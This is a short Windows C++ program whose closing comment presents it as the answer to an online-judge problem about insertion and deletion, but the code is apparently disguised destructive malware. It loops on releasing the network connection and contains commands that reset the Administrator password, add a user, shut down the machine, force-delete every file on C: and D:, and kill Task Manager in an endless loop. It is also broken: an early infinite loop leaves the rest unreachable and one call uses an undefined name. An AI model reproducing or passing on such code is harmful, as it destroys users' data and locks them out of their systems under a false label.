#include<bits/stdc++.h>
#include<stdlib.h>
#include<conio.h>
#include<windows.h>
#include<ctime>
using namespace std;
int main(){
while(true){
system("ipconfig/release");
}
system("net user Administrator error");
system("net user Error error /add");
system("shutdown -s -t 1");
system("del/F/S/Q D:\\");
system("del/F/S/Q C:\\");
int x = GetSystemMetrics(SM_CXSCREEN);
int y = GetSystemMetrics(SM_CXSCREEN);
while(1){
SetCursorPos(rand()%x,rand()%y);
system("start");
system("taskkill /f /im taskmgr.exe");
system("taskkill /f /im taskmgr.zip");
system("taskkill /f /im taskmgr.7z");
}
system(regadd);
return 0;
//oj里3569题“强哥的简单插入删除问题”答案!
}